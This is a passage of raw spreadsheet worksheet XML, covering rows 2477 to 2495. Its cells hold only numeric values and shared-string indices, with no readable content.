      </c>
      <c r="X2477" s="12">
        <v>44</v>
      </c>
      <c r="Y2477" s="12" t="s">
        <v>17463</v>
      </c>
    </row>
    <row r="2478" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2478" s="12">
        <v>11994</v>
      </c>
      <c r="B2478" s="12" t="s">
        <v>31255</v>
      </c>
      <c r="D2478" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2478" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F2478" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2478" s="12" t="s">
        <v>17464</v>
      </c>
      <c r="H2478" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2478" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J2478" s="12" t="s">
        <v>9219</v>
      </c>
      <c r="K2478" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2478" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M2478" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N2478" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O2478" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2478" s="12" t="s">
        <v>17431</v>
      </c>
      <c r="Q2478" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2478" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2478" s="12" t="s">
        <v>17465</v>
      </c>
      <c r="T2478" s="12" t="s">
        <v>10491</v>
      </c>
      <c r="U2478" s="12" t="s">
        <v>17466</v>
      </c>
      <c r="V2478" s="12" t="s">
        <v>3725</v>
      </c>
      <c r="W2478" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2478" s="12">
        <v>20</v>
      </c>
      <c r="Y2478" s="12" t="s">
        <v>17467</v>
      </c>
    </row>
    <row r="2479" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2479" s="12">
        <v>11996</v>
      </c>
      <c r="B2479" s="12" t="s">
        <v>30472</v>
      </c>
      <c r="D2479" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2479" s="12" t="s">
        <v>31454</v>
      </c>
      <c r="F2479" s="12" t="s">
        <v>30453</v>
      </c>
      <c r="G2479" s="12" t="s">
        <v>17468</v>
      </c>
      <c r="H2479" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2479" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J2479" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2479" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2479" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2479" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2479" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2479" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2479" s="12" t="s">
        <v>17387</v>
      </c>
      <c r="Q2479" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2479" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2479" s="12" t="s">
        <v>17469</v>
      </c>
      <c r="T2479" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2479" s="12" t="s">
        <v>17470</v>
      </c>
      <c r="V2479" s="12" t="s">
        <v>17471</v>
      </c>
      <c r="W2479" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2479" s="12">
        <v>1</v>
      </c>
      <c r="Y2479" s="12" t="s">
        <v>17472</v>
      </c>
    </row>
    <row r="2480" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2480" s="12">
        <v>12001</v>
      </c>
      <c r="B2480" s="12" t="s">
        <v>31249</v>
      </c>
      <c r="D2480" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2480" s="12" t="s">
        <v>31242</v>
      </c>
      <c r="G2480" s="12" t="s">
        <v>17478</v>
      </c>
      <c r="H2480" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2480" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J2480" s="12" t="s">
        <v>9219</v>
      </c>
      <c r="K2480" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2480" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2480" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2480" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2480" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2480" s="12" t="s">
        <v>17431</v>
      </c>
      <c r="Q2480" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2480" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2480" s="12" t="s">
        <v>17479</v>
      </c>
      <c r="T2480" s="12" t="s">
        <v>4934</v>
      </c>
      <c r="U2480" s="12" t="s">
        <v>17480</v>
      </c>
      <c r="V2480" s="12" t="s">
        <v>3725</v>
      </c>
      <c r="W2480" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2480" s="12">
        <v>10</v>
      </c>
      <c r="Y2480" s="12" t="s">
        <v>17481</v>
      </c>
    </row>
    <row r="2481" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2481" s="12">
        <v>12004</v>
      </c>
      <c r="B2481" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2481" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2481" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F2481" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2481" s="12" t="s">
        <v>17482</v>
      </c>
      <c r="H2481" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2481" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J2481" s="12" t="s">
        <v>9219</v>
      </c>
      <c r="K2481" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2481" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2481" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2481" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2481" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2481" s="12" t="s">
        <v>17431</v>
      </c>
      <c r="Q2481" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2481" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2481" s="12" t="s">
        <v>17483</v>
      </c>
      <c r="T2481" s="12" t="s">
        <v>10491</v>
      </c>
      <c r="U2481" s="12" t="s">
        <v>17484</v>
      </c>
      <c r="V2481" s="12" t="s">
        <v>3725</v>
      </c>
      <c r="W2481" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2481" s="12">
        <v>45</v>
      </c>
      <c r="Y2481" s="12" t="s">
        <v>17485</v>
      </c>
    </row>
    <row r="2482" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2482" s="12">
        <v>12014</v>
      </c>
      <c r="B2482" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2482" s="12" t="s">
        <v>30427</v>
      </c>
      <c r="E2482" s="12" t="s">
        <v>31429</v>
      </c>
      <c r="F2482" s="12" t="s">
        <v>30430</v>
      </c>
      <c r="G2482" s="12" t="s">
        <v>17486</v>
      </c>
      <c r="H2482" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2482" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J2482" s="12" t="s">
        <v>139</v>
      </c>
      <c r="K2482" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2482" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2482" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2482" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2482" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2482" s="12" t="s">
        <v>7001</v>
      </c>
      <c r="Q2482" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2482" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2482" s="12" t="s">
        <v>17487</v>
      </c>
      <c r="T2482" s="12" t="s">
        <v>6901</v>
      </c>
      <c r="U2482" s="12" t="s">
        <v>17488</v>
      </c>
      <c r="V2482" s="12" t="s">
        <v>995</v>
      </c>
      <c r="W2482" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2482" s="12">
        <v>10</v>
      </c>
      <c r="Y2482" s="12" t="s">
        <v>17489</v>
      </c>
    </row>
    <row r="2483" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2483" s="12">
        <v>12018</v>
      </c>
      <c r="B2483" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2483" s="12" t="s">
        <v>30527</v>
      </c>
      <c r="E2483" s="12" t="s">
        <v>31428</v>
      </c>
      <c r="F2483" s="12" t="s">
        <v>30514</v>
      </c>
      <c r="G2483" s="12" t="s">
        <v>17490</v>
      </c>
      <c r="H2483" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2483" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J2483" s="12" t="s">
        <v>12555</v>
      </c>
      <c r="K2483" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2483" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M2483" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N2483" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O2483" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2483" s="12" t="s">
        <v>17491</v>
      </c>
      <c r="Q2483" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2483" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2483" s="12" t="s">
        <v>17492</v>
      </c>
      <c r="T2483" s="12" t="s">
        <v>17493</v>
      </c>
      <c r="U2483" s="12" t="s">
        <v>17494</v>
      </c>
      <c r="V2483" s="12" t="s">
        <v>13296</v>
      </c>
      <c r="W2483" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2483" s="12">
        <v>2</v>
      </c>
      <c r="Y2483" s="12" t="s">
        <v>17495</v>
      </c>
    </row>
    <row r="2484" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2484" s="12">
        <v>12019</v>
      </c>
      <c r="B2484" s="12" t="s">
        <v>31249</v>
      </c>
      <c r="D2484" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2484" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2484" s="12" t="s">
        <v>17496</v>
      </c>
      <c r="H2484" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2484" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J2484" s="12" t="s">
        <v>201</v>
      </c>
      <c r="K2484" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2484" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2484" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2484" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2484" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2484" s="12" t="s">
        <v>17387</v>
      </c>
      <c r="Q2484" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2484" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2484" s="12" t="s">
        <v>17497</v>
      </c>
      <c r="T2484" s="12" t="s">
        <v>14472</v>
      </c>
      <c r="U2484" s="12" t="s">
        <v>17498</v>
      </c>
      <c r="V2484" s="12" t="s">
        <v>4689</v>
      </c>
      <c r="W2484" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2484" s="12">
        <v>11</v>
      </c>
      <c r="Y2484" s="12" t="s">
        <v>17499</v>
      </c>
    </row>
    <row r="2485" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2485" s="12">
        <v>12021</v>
      </c>
      <c r="B2485" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C2485" s="12" t="s">
        <v>30474</v>
      </c>
      <c r="D2485" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E2485" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F2485" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G2485" s="12" t="s">
        <v>17500</v>
      </c>
      <c r="H2485" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2485" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2485" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K2485" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2485" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2485" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2485" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2485" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2485" s="12" t="s">
        <v>17501</v>
      </c>
      <c r="Q2485" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2485" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2485" s="12" t="s">
        <v>17502</v>
      </c>
      <c r="T2485" s="12" t="s">
        <v>17503</v>
      </c>
      <c r="U2485" s="12" t="s">
        <v>9750</v>
      </c>
      <c r="V2485" s="12" t="s">
        <v>3902</v>
      </c>
      <c r="W2485" s="12">
        <v>12237</v>
      </c>
      <c r="X2485" s="12">
        <v>64</v>
      </c>
      <c r="Y2485" s="12" t="s">
        <v>17504</v>
      </c>
    </row>
    <row r="2486" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2486" s="12">
        <v>12031</v>
      </c>
      <c r="B2486" s="12" t="s">
        <v>30012</v>
      </c>
      <c r="D2486" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2486" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2486" s="12" t="s">
        <v>17505</v>
      </c>
      <c r="H2486" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2486" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2486" s="12" t="s">
        <v>1656</v>
      </c>
      <c r="K2486" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2486" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2486" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2486" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2486" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2486" s="12" t="s">
        <v>17387</v>
      </c>
      <c r="Q2486" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2486" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2486" s="12" t="s">
        <v>17506</v>
      </c>
      <c r="T2486" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2486" s="12" t="s">
        <v>17507</v>
      </c>
      <c r="V2486" s="12" t="s">
        <v>3602</v>
      </c>
      <c r="W2486" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2486" s="12">
        <v>13</v>
      </c>
      <c r="Y2486" s="12" t="s">
        <v>17508</v>
      </c>
    </row>
    <row r="2487" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2487" s="12">
        <v>12032</v>
      </c>
      <c r="B2487" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C2487" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D2487" s="12" t="s">
        <v>30457</v>
      </c>
      <c r="F2487" s="12" t="s">
        <v>30453</v>
      </c>
      <c r="G2487" s="12" t="s">
        <v>17509</v>
      </c>
      <c r="H2487" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2487" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2487" s="12" t="s">
        <v>1656</v>
      </c>
      <c r="K2487" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2487" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2487" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2487" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2487" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2487" s="12" t="s">
        <v>17220</v>
      </c>
      <c r="Q2487" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2487" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2487" s="12" t="s">
        <v>17510</v>
      </c>
      <c r="T2487" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2487" s="12" t="s">
        <v>17511</v>
      </c>
      <c r="V2487" s="12" t="s">
        <v>17055</v>
      </c>
      <c r="W2487" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2487" s="12">
        <v>2</v>
      </c>
      <c r="Y2487" s="12" t="s">
        <v>17512</v>
      </c>
    </row>
    <row r="2488" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2488" s="12">
        <v>12038</v>
      </c>
      <c r="B2488" s="12" t="s">
        <v>30853</v>
      </c>
      <c r="D2488" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2488" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F2488" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2488" s="12" t="s">
        <v>17517</v>
      </c>
      <c r="H2488" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2488" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J2488" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K2488" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2488" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2488" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2488" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2488" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2488" s="12" t="s">
        <v>17518</v>
      </c>
      <c r="Q2488" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2488" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2488" s="12" t="s">
        <v>17519</v>
      </c>
      <c r="T2488" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2488" s="12" t="s">
        <v>17520</v>
      </c>
      <c r="V2488" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W2488" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2488" s="12">
        <v>4</v>
      </c>
      <c r="Y2488" s="12" t="s">
        <v>17521</v>
      </c>
    </row>
    <row r="2489" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2489" s="12">
        <v>12041</v>
      </c>
      <c r="B2489" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C2489" s="12" t="s">
        <v>28260</v>
      </c>
      <c r="D2489" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2489" s="12" t="s">
        <v>31469</v>
      </c>
      <c r="F2489" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2489" s="12" t="s">
        <v>17522</v>
      </c>
      <c r="H2489" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2489" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J2489" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2489" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2489" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2489" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2489" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2489" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2489" s="12" t="s">
        <v>17523</v>
      </c>
      <c r="Q2489" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2489" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2489" s="12" t="s">
        <v>17524</v>
      </c>
      <c r="T2489" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2489" s="12" t="s">
        <v>17237</v>
      </c>
      <c r="V2489" s="12" t="s">
        <v>17525</v>
      </c>
      <c r="W2489" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2489" s="12">
        <v>7</v>
      </c>
      <c r="Y2489" s="12" t="s">
        <v>17526</v>
      </c>
    </row>
    <row r="2490" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2490" s="12">
        <v>12042</v>
      </c>
      <c r="B2490" s="12" t="s">
        <v>30525</v>
      </c>
      <c r="C2490" s="12" t="s">
        <v>30526</v>
      </c>
      <c r="D2490" s="12" t="s">
        <v>30527</v>
      </c>
      <c r="E2490" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F2490" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2490" s="12" t="s">
        <v>17527</v>
      </c>
      <c r="H2490" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2490" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2490" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K2490" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2490" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2490" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2490" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2490" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2490" s="12" t="s">
        <v>17396</v>
      </c>
      <c r="Q2490" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2490" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2490" s="12" t="s">
        <v>17528</v>
      </c>
      <c r="T2490" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2490" s="12" t="s">
        <v>17529</v>
      </c>
      <c r="V2490" s="12" t="s">
        <v>7591</v>
      </c>
      <c r="W2490" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2490" s="12">
        <v>2</v>
      </c>
      <c r="Y2490" s="12" t="s">
        <v>17530</v>
      </c>
    </row>
    <row r="2491" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2491" s="12">
        <v>12046</v>
      </c>
      <c r="B2491" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C2491" s="12" t="s">
        <v>30516</v>
      </c>
      <c r="D2491" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2491" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F2491" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2491" s="12" t="s">
        <v>17532</v>
      </c>
      <c r="H2491" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2491" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2491" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K2491" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2491" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2491" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2491" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2491" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2491" s="12" t="s">
        <v>17533</v>
      </c>
      <c r="Q2491" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2491" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2491" s="12" t="s">
        <v>17534</v>
      </c>
      <c r="T2491" s="12" t="s">
        <v>17055</v>
      </c>
      <c r="U2491" s="12" t="s">
        <v>17535</v>
      </c>
      <c r="V2491" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W2491" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2491" s="12">
        <v>5</v>
      </c>
      <c r="Y2491" s="12" t="s">
        <v>17536</v>
      </c>
    </row>
    <row r="2492" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2492" s="12">
        <v>12048</v>
      </c>
      <c r="B2492" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C2492" s="12" t="s">
        <v>28364</v>
      </c>
      <c r="D2492" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F2492" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G2492" s="12" t="s">
        <v>17538</v>
      </c>
      <c r="H2492" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2492" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2492" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K2492" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2492" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2492" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2492" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2492" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2492" s="12" t="s">
        <v>17531</v>
      </c>
      <c r="Q2492" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2492" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2492" s="12" t="s">
        <v>17539</v>
      </c>
      <c r="T2492" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2492" s="12" t="s">
        <v>17540</v>
      </c>
      <c r="V2492" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W2492" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2492" s="12">
        <v>2</v>
      </c>
      <c r="Y2492" s="12" t="s">
        <v>17541</v>
      </c>
    </row>
    <row r="2493" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2493" s="12">
        <v>12049</v>
      </c>
      <c r="B2493" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2493" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2493" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F2493" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2493" s="12" t="s">
        <v>17542</v>
      </c>
      <c r="H2493" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2493" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J2493" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2493" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2493" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2493" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2493" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2493" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2493" s="12" t="s">
        <v>17533</v>
      </c>
      <c r="Q2493" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2493" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2493" s="12" t="s">
        <v>17543</v>
      </c>
      <c r="T2493" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2493" s="12" t="s">
        <v>17544</v>
      </c>
      <c r="V2493" s="12" t="s">
        <v>5207</v>
      </c>
      <c r="W2493" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2493" s="12">
        <v>3</v>
      </c>
      <c r="Y2493" s="12" t="s">
        <v>17545</v>
      </c>
    </row>
    <row r="2494" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2494" s="12">
        <v>12061</v>
      </c>
      <c r="B2494" s="12" t="s">
        <v>31255</v>
      </c>
      <c r="D2494" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E2494" s="18" t="s">
        <v>31604</v>
      </c>
      <c r="F2494" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2494" s="12" t="s">
        <v>17555</v>
      </c>
      <c r="H2494" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2494" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2494" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K2494" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2494" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2494" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2494" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2494" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2494" s="12" t="s">
        <v>17533</v>
      </c>
      <c r="Q2494" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2494" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2494" s="12" t="s">
        <v>17556</v>
      </c>
      <c r="T2494" s="12" t="s">
        <v>17090</v>
      </c>
      <c r="U2494" s="12" t="s">
        <v>17557</v>
      </c>
      <c r="V2494" s="12" t="s">
        <v>9751</v>
      </c>
      <c r="W2494" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2494" s="12">
        <v>60</v>
      </c>
      <c r="Y2494" s="12" t="s">
        <v>17558</v>
      </c>
    </row>
    <row r="2495" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2495" s="12">
        <v>12064</v>
      </c>
      <c r="B2495" s="12" t="s">
        <v>30858</v>
      </c>
      <c r="C2495" s="12" t="s">
        <v>30859</v>
      </c>
      <c r="D2495" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2495" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F2495" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2495" s="12" t="s">
        <v>17559</v>
      </c>
      <c r="H2495" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2495" s="12" t="s">
        <v>152</v>
      </c>
      <c r="J2495" s="12" t="s">
        <v>153</v>
      </c>
      <c r="K2495" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2495" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2495" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2495" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2495" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2495" s="12" t="s">
        <v>17533</v>
      </c>
      <c r="Q2495" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2495" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2495" s="12" t="s">
        <v>17560</v>
      </c>
      <c r="T2495" s="12" t="s">
        <v>12642</v>
      </c>
      <c r="U2495" s="12" t="s">
        <v>17561</v>
      </c>
      <c r="V2495" s="12" t="s">
        <v>4748</v>
      </c>
      <c r="W2495" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2495" s="12">
        <v>5</v>
      </c>
